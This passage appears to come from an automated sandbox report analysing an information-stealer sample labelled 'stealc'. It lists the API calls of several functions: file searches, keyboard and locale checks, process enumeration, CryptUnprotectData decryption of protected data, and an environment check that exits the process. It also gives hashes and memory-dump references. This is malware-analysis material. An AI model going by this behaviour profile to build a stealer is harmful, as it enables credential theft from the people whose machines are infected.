Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

Strings

\*.*, xrefs: 006917F1

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 8b658647d65ec90ea973e904da42209777a4befb37f84659b683af9a7005d0df
Instruction ID: 089974eaa6cd3c9d15fa0c46baf51f45c2bea8ca8dbbf2649fa29695886304a6
Opcode Fuzzy Hash: 8b658647d65ec90ea973e904da42209777a4befb37f84659b683af9a7005d0df
Instruction Fuzzy Hash: 05122F719111189BCBD9FBA0CC96AEE737AAF16300F40419EB10B66091EF346F89CF95

Function 0069DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcatA.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006B14B0,006B0C2A), ref: 0069DAEB
StrCmpCA.SHLWAPI(?,006B14B4), ref: 0069DB33
StrCmpCA.SHLWAPI(?,006B14B8), ref: 0069DB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 0069DDCC
FindClose.KERNEL32(000000FF), ref: 0069DDDE

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 2d8b15c13ab7e26774e123ea74d94863c7fc018e29afd5e12c4ab24e688b4b59
Instruction ID: 7bd7b2892b88e5096c86f20271a7a03531cb09ccee7981c95898d67505d543d7
Opcode Fuzzy Hash: 2d8b15c13ab7e26774e123ea74d94863c7fc018e29afd5e12c4ab24e688b4b59
Instruction Fuzzy Hash: 729131B69001049BCF94FBB0DC569EE737EAB85300F40866DA90A96581EF34DF09CF96

Function 0069E430 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcatA.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,006B0D73), ref: 0069E4A2
StrCmpCA.SHLWAPI(?,006B14F8), ref: 0069E4F2
StrCmpCA.SHLWAPI(?,006B14FC), ref: 0069E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0069EBDF

Strings

\*.*, xrefs: 0069E44D
i, xrefs: 0069EBF5, 0069E5EB, 0069E71C, 0069E85B, 0069E4B9, 0069E5EE, 0069E71F, 0069E85E

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*$i
API String ID: 433455689-3470265330
Opcode ID: c7c633f1861db171dd9caf8f69afc83160a194ad7dccea28a5ea47b14d7bd4ac
Instruction ID: 38c0b8f63df206bb7b8ff050dd7aabd0d5b3e96f3f6650938df74a4af5fc57a0
Opcode Fuzzy Hash: c7c633f1861db171dd9caf8f69afc83160a194ad7dccea28a5ea47b14d7bd4ac
Instruction Fuzzy Hash: 651283719101149BDB94FBA0DC96EEE733AAF55300F4041AEB50B96091EF34AF49CF96

Function 006A7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

GetKeyboardLayoutList.USER32(00000000,00000000,006B05AF), ref: 006A7BE1
LocalAlloc.KERNEL32(00000040,?), ref: 006A7BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 006A7C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 006A7C62
LocalFree.KERNEL32(00000000), ref: 006A7D22

Strings

/ , xrefs: 006A7C7F

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: ecfc37f36df1a9825870b0969fe05c4b0e56c90f4994b85c254435e7495bc47f
Instruction ID: 9afe05209da1bbacd802bf43d1a79a7ef6d73c84d75ad9bf90d54c034276e93c
Opcode Fuzzy Hash: ecfc37f36df1a9825870b0969fe05c4b0e56c90f4994b85c254435e7495bc47f
Instruction Fuzzy Hash: A3417171941118AFDB64EB94DC99BEEB379FF45700F2042DAE40A62281DB342F85CFA5

Function 006A9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006A961E
Process32First.KERNEL32(006B0ACA,00000128), ref: 006A9632
Process32Next.KERNEL32(006B0ACA,00000128), ref: 006A9647
StrCmpCA.SHLWAPI(?,00000000), ref: 006A965C
CloseHandle.KERNEL32(006B0ACA), ref: 006A967A

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f6d4bfd35ad0421a34311597161d8df95b6a304e0aaef88abaaacd4e7e1944ce
Instruction ID: cba2f04aa5a7267499c93763c473aff84a4c29dc20b44cc1cfa9abbc0be0f0c7
Opcode Fuzzy Hash: f6d4bfd35ad0421a34311597161d8df95b6a304e0aaef88abaaacd4e7e1944ce
Instruction Fuzzy Hash: A0010C75A01208ABDB14DFA5CD48BEDB7F9FF49700F204299A905A6240DB749F40DF61

Function 00699B60 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00699B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00699BA3
memcpy.MSVCRT(?,?,?), ref: 00699BC6
LocalFree.KERNEL32(?), ref: 00699BD3

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: 79f906ff35b32610bd1230fe3b64aadb7cafffe0a890522fbfb0ace4dc8f6956
Instruction ID: f4759ce6c8985bf07b79d6eebf95bb6fb44080ce30e0403570028a0b17c2e3e3
Opcode Fuzzy Hash: 79f906ff35b32610bd1230fe3b64aadb7cafffe0a890522fbfb0ace4dc8f6956
Instruction Fuzzy Hash: D811B7B8A00209EFCB04DF98D985AAE77B9FF89300F104599E915A7354D774AE50CFA1

Function 006A7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00A10410,00000000,?,006B0E10,00000000,?,00000000,00000000), ref: 006A7A63
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00A10410,00000000,?,006B0E10,00000000,?,00000000,00000000,?), ref: 006A7A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00A10410,00000000,?,006B0E10,00000000,?,00000000,00000000,?), ref: 006A7A7D
wsprintfA.USER32 ref: 006A7AB7

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 04b651bda692fee1dd872fdfed394c7d46f349886dcdd88bc93a880669b357bd
Instruction ID: bbf27f3a3e070804a67f96b8f8255eb22f867e9a13d4e51a6c7a3c3a75d0f28a
Opcode Fuzzy Hash: 04b651bda692fee1dd872fdfed394c7d46f349886dcdd88bc93a880669b357bd
Instruction Fuzzy Hash: 2F11A5B1946228EBEB14DF54DC45FAAB778F705711F1043A6EA06932C0C7745E40CF51

Function 006A7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006911B7), ref: 006A7880
HeapAlloc.KERNEL32(00000000,?,?,?,006911B7), ref: 006A7887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 006A789F

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 574eb58f73ca0e942a920a109cf9a1391c107475e5642d7c7b0e28c542da69f9
Instruction ID: 70615cbb819b5257068453752ff466819592e5bb714788ae7a61141832d6e8c0
Opcode Fuzzy Hash: 574eb58f73ca0e942a920a109cf9a1391c107475e5642d7c7b0e28c542da69f9
Instruction Fuzzy Hash: FBF04FB1944208ABC704DF98DD49BAEBBB8FB05711F10026AFA05A2680C77919048BA1

Function 00691160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,006A6A17,006B0AEF), ref: 0069116A
ExitProcess.KERNEL32 ref: 0069117E

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
